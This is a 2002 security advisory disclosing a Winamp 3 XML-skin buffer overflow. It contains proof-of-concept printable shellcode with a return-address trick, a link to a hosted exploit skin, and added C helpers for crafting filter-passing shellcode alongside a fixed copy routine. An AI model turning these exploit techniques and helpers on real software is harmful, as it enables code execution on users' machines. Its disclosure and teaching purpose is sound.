IIL Advisory: Winamp 3 (1.0.0.488) XML parser buffer overflow vulnerability

From: annihilatorat_private
Date: Sun Sep 29 2002 - 11:00:28 PDT


    
    	           [ Illegal Instruction Labs Advisory ]
    [------------------------------------------------------------------------]
    Advisory name:    Winamp 3 (1.0.0.488) XML parser buffer overflow
                      vulnerability
    Application:      Winamp 3 1.0.0.488
    Homepage:         www.winamp.com
    Impact:           A buffer overflow in the XML parser DLL (wasabi.dll)
                      allows execution of arbitrary code.
    Platform:         All x86 win32, not tested on x86 Linux
    Date:             29.9.2002
    Tested on:        Windows Me (4.90)
    Discovered by:    Sunnis						
    Mail me @:        annihilatorat_private	
    
    
    
    ======[ Overview 
    
    Winamp is, as we all know, the most popular MP3 player for Windows. 
    Winamp 3 is a revolutionary successor to Winamp 2.xx with many new 
    features, such as a new skinning system.
    
    ======[ Problem
    
    Winamp 3 skin files have the extension .WAL and are opened automatically 
    by MSIE. They are actually ZIP archives with a changed extension, 
    containing the images and configuration files used by Wasabi (the Winamp 
    skinning system). 
    
    The Wasabi engine is implemented in wasabi.dll and is designed to provide 
    a highly configurable, OS-independent framework for building skinnable 
    applications quickly and easily (which is why wasabi.dll is 800K in 
    size).
    
    A buffer overflow in wasabi.dll occurs if the <include file="PATH"/> tag 
    is given an extremely long value for PATH (MAX_PATH on Win32 is defined 
    as only 260 bytes). This allows the execution of arbitrary code inside 
    the address space of Winamp. Wasabi filters most non-printable 
    characters, but specially crafted shellcode will still pass through.
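    The copy the advisory describes, reconstructed as an added example: this is illustrative C written for this page, not wasabi.dll's code (which is closed source and not shown in the advisory), so the parser, function names and buffer layout are hypothetical. It extracts the file attribute of an <include/> tag into a MAX_PATH (260-byte) stack buffer, first unchecked and then with the length check that closes the hole, and builds the over-long sample input the way the PoC skin does.

```c
/* include_path.c -- added illustration of the bug class described above.
 * This is not wasabi.dll's code (closed source; the advisory shows none of
 * it): the parser, names and layout are hypothetical.  It copies the
 * file="..." value of an <include/> tag into a MAX_PATH stack buffer, first
 * the unchecked way and then with the length check that closes the hole. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#ifndef MAX_PATH
#define MAX_PATH 260    /* the Win32 value, NUL included */
#endif

/* Locate the value of file="..." inside the first <include ...> tag of xml.
 * Returns a pointer to the value and stores its length (quotes excluded), or
 * NULL when the tag, attribute or closing quote is missing.  Deliberately
 * minimal: no entity decoding, no other attributes considered. */
const char *find_include_path(const char *xml, size_t *len)
{
    const char *tag = strstr(xml, "<include");
    if (!tag) return NULL;
    const char *end = strchr(tag, '>');
    if (!end) return NULL;
    const char *val = strstr(tag, "file=\"");
    if (!val || val > end) return NULL;
    val += strlen("file=\"");
    const char *q = memchr(val, '"', (size_t)(end - val));
    if (!q) return NULL;
    *len = (size_t)(q - val);
    return val;
}

/* Unchecked variant: the pattern the advisory describes.  A value longer than
 * MAX_PATH - 1 bytes is copied past the end of 'path', over whatever follows
 * it on the stack, saved return address included.  Shown for contrast only;
 * do not call it with untrusted input. */
int load_include_unchecked(const char *xml)
{
    char path[MAX_PATH];
    size_t len;
    const char *p = find_include_path(xml, &len);
    if (!p) return -1;
    memcpy(path, p, len);   /* no bound on len: stack buffer overflow */
    path[len] = '\0';
    return 0;               /* a real handler would open 'path' here */
}

/* Checked variant: refuse the value before touching the buffer. */
int load_include_checked(const char *xml, char *path_out, size_t path_size)
{
    size_t len;
    const char *p = find_include_path(xml, &len);
    if (!p) return -1;
    if (len >= path_size) return -2;   /* does not fit, NUL included */
    memcpy(path_out, p, len);
    path_out[len] = '\0';
    return 0;
}

/* Constructed sample input: an <include/> whose path is n 'A' bytes, the way
 * the advisory's "extremely long" value is built.  Returns 0, or -1 if out is
 * too small. */
int build_include_tag(size_t n, char *out, size_t out_size)
{
    const char *head = "<include file=\"", *tail = "\"/>";
    size_t hl = strlen(head), tl = strlen(tail);
    if (hl + n + tl + 1 > out_size) return -1;
    memcpy(out, head, hl);
    memset(out + hl, 'A', n);
    memcpy(out + hl + n, tail, tl + 1);
    return 0;
}

int main(void)
{
    static char xml[2048];
    char path[MAX_PATH];
    size_t lens[] = { 14, 259, 260, 600 };
    for (size_t i = 0; i < sizeof lens / sizeof lens[0]; i++) {
        build_include_tag(lens[i], xml, sizeof xml);
        printf("path of %3zu bytes: checked load -> %d\n",
               lens[i], load_include_checked(xml, path, sizeof path));
    }
    /* load_include_unchecked(xml) on the 600-byte tag would smash the stack
     * (what the PoC skin does); it is only safe on inputs that fit. */
    return 0;
}
```

    The check is on the attribute length before the copy, not on the copy itself: anything of 260 bytes or more is refused outright, since the NUL must fit too.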
    
    ======[ Exploit
    
    By supplying an extremely long string of 'A' characters and setting the 
    kernel-mode debugger to catch page faults, one can see that at the moment 
    of the fault both EAX and EBX hold pointers to [OverwrittenEIP-4]. ESP is 
    unusable since it points at some unrelated value.
    
    The Winamp 3 executable (studio.exe) loads many system DLLs which contain 
    usable instructions:
            jmp eax
            jmp ebx
            call eax
            call ebx
    
    On Windows Me there is such an instruction at 0x736D2120. (Some of 
    Winamp's own modules cannot be used: the bytes of their image base do not 
    all fall in the range 0x20 to 0x7F that Wasabi considers valid, so an 
    address inside them triggers an error message.)
    
    Stack would look like this:
    ['AAAAAAAAAAAA'... XXXX[OverwrittenEIP][shellcode]
                       ^^^^-address contained inside EAX and EBX
    
    Sample proof of concept shellcode would look like this:
    
                                      ; ASCII opcode representation:
            jmp __skip                ; ë+   (EB 2B)
            db 0, 0
            dd 736D2120h              ; the overwritten EIP: "call eax" on WinMe,
                                      ; bytes 20 21 6D 73 = " !ms"
            
            db 25h dup ('A')          ; padding; makes the jmp displacement
                                      ; 2Bh ('+'), a printable byte
            
    __skip: mov eax, 39406567h        ; ¸ge@9
            sub eax, 794c2421h        ; -!$Ly
            push eax                  ; P
            pop ecx                   ; Y
            ; ecx = eax = bff44146 = USER32!MessageBoxA on WinMe
    
            push 'aaaa'               ; haaaa
            pop eax                   ; X
            xor eax, 'aaaa'           ; 5aaaa
            ; eax = 0
    
            push eax                  ; P = NULL terminator
            push "tiol"               ; hloit
            push "pxe "               ; h exp
            push "tpec"               ; hcept
            push "noc-"               ; h-con
            push "fo-f"               ; hf-of
            push "oorp"               ; hproo
            push " 3pm"               ; hmp3 
            push "aniW"               ; hWina
            push esp                  ; T
            pop edx                   ; Z
            ; edx = ptr to "Winamp3 proof-of-concept exploit"
    
            push eax                  ; P  (uType = 0)
            push eax                  ; P  (lpCaption = NULL)
            push edx                  ; R  (lpText = edx)
            push eax                  ; P  (hWnd = NULL)
    
            push ebx                  ; S = return address (EBX points back at
                                      ;     the jmp above)
    
            push ecx                  ; Q = user32!MessageBoxA (v. 4.90.3000)
            retn                      ; Ă  (C3h as shown in code page 1250)
    
    Filtering characters provides no protection at all. Writing fully 
    alphanumeric shellcode with a specialised kit such as irx's ASC is even 
    easier.
    
    You can try this one here: kamikaza.ffk.hr/advisory/default.wal
    It works on WinMe (4.90) only, but adapting it to other Win32 versions is 
    trivial.
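    Two of the tricks the listing above relies on, as an added example (C written for this page, not the author's code): the mov/sub operand search that produced 39406567h - 794c2421h = bff44146h, generalised here to two subtrahends because a single printable sub cannot reach every byte value; the printable check that makes 0x736D2120 a usable return address; and the push-string encoder behind the hWina ... hloit sequence. The accepted byte range 0x20..0x7E is an assumption based on the advisory's "between 0x20 and 0x7F" remark.

```c
/* printable_ops.c -- helpers for the printable-byte shellcode tricks in the
 * listing above.  Added illustration, not code from the advisory.
 * Assumption: the filter accepts exactly the bytes 0x20..0x7E (the advisory
 * says "between 0x20 and 0x7F"); adjust byte_ok() if the real range differs. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

static int byte_ok(uint8_t b) { return b >= 0x20 && b <= 0x7e; }

/* True when all four little-endian bytes of v survive the filter, which is
 * what makes 0x736D2120 (" !ms") a usable return address and most other
 * image bases not. */
int dword_printable(uint32_t v)
{
    for (int i = 0; i < 4; i++)
        if (!byte_ok((uint8_t)(v >> (8 * i))))
            return 0;
    return 1;
}

/* Index of the first byte in buf the filter would reject, or -1 if all pass. */
long first_filtered_byte(const uint8_t *buf, size_t n)
{
    for (size_t i = 0; i < n; i++)
        if (!byte_ok(buf[i]))
            return (long)i;
    return -1;
}

/* Search for printable X, Y1 (and Y2 if needed) with X - Y1 - Y2 == target
 * mod 2^32, working byte by byte with borrow.  This is how the listing gets
 * bff44146h from 39406567h - 794c2421h.  One sub only reaches byte values
 * 0..94 and 162..255 (xb - yb spans -94..94), so a second subtrahend is tried
 * for the rest; two always suffice.  Returns the number of subs used, 0 on
 * failure. */
int find_sub_chain(uint32_t target, uint32_t *x, uint32_t *y1, uint32_t *y2)
{
    for (int nsub = 1; nsub <= 2; nsub++) {
        uint32_t X = 0, Y1 = 0, Y2 = 0;
        int borrow = 0, ok = 1;
        for (int i = 0; i < 4 && ok; i++) {
            int want = (int)((target >> (8 * i)) & 0xff), found = 0;
            int blo = nsub == 2 ? 0x20 : 0, bhi = nsub == 2 ? 0x7e : 0;
            for (int xb = 0x20; xb <= 0x7e && !found; xb++)
                for (int a = 0x20; a <= 0x7e && !found; a++)
                    for (int b = blo; b <= bhi && !found; b++) {
                        int diff = xb - a - b - borrow, nb = 0;
                        if (diff < 0) { diff += 256; nb = 1; }  /* diff >= -221 */
                        if (diff != want) continue;
                        X  |= (uint32_t)xb << (8 * i);
                        Y1 |= (uint32_t)a  << (8 * i);
                        Y2 |= (uint32_t)b  << (8 * i);
                        borrow = nb;
                        found = 1;
                    }
            ok = found;
        }
        if (ok) { *x = X; *y1 = Y1; *y2 = Y2; return nsub; }
    }
    return 0;
}

/* Emit the chain of "push imm32" (68h = 'h') that lays s out on the stack the
 * way the hWina ... hloit pushes in the listing do: four-byte chunks pushed
 * last-to-first so the text reads forward from ESP.  s is space-padded to a
 * multiple of four; the zero terminator is the caller's job (push eax with
 * eax = 0 in the listing).  out needs 5 * ceil(strlen(s) / 4) bytes; returns
 * the number of bytes written. */
size_t emit_push_string(const char *s, uint8_t *out)
{
    size_t len = strlen(s), nchunks = (len + 3) / 4, n = 0;
    for (size_t c = nchunks; c-- > 0;) {
        out[n++] = 0x68;
        for (size_t i = 0; i < 4; i++) {
            size_t k = c * 4 + i;
            out[n++] = k < len ? (uint8_t)s[k] : (uint8_t)' ';
        }
    }
    return n;
}

int main(void)
{
    uint32_t x, y1, y2;
    int n = find_sub_chain(0xBFF44146u, &x, &y1, &y2);   /* MessageBoxA on WinMe */
    printf("mov eax, %08Xh ; sub eax, %08Xh", x, y1);
    if (n == 2) printf(" ; sub eax, %08Xh", y2);
    printf("  -> eax = %08X\n", x - y1 - y2);

    printf("0x736D2120 printable: %d, 0xBFF44146 printable: %d\n",
           dword_printable(0x736D2120u), dword_printable(0xBFF44146u));

    uint8_t buf[64];
    size_t len = emit_push_string("Winamp3 proof-of-concept exploit", buf);
    printf("%zu push bytes, first filtered at %ld: %.*s\n",
           len, first_filtered_byte(buf, len), (int)len, (const char *)buf);
    return 0;
}
```

    The search picks the lowest printable operands it finds, so it returns a different pair from the author's for the same target; any pair it returns subtracts to the target and consists only of bytes the filter lets through, which is all the technique needs.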
    
    ======[ Greetz 
    
    Greets go to all members of IIL (http://www.ii-labs.tk): BoyScout, 
    DownBload, Fr1c, h4z4rd, StYx and (in no specific order): Elrond, 
    harlequin, St0rm, Megaquad, Dark-igor, bila, phreax, Defiant and everyone 
    else I forgot.
    



    This archive was generated by hypermail 2b30 : Mon Sep 30 2002 - 14:35:01 PDT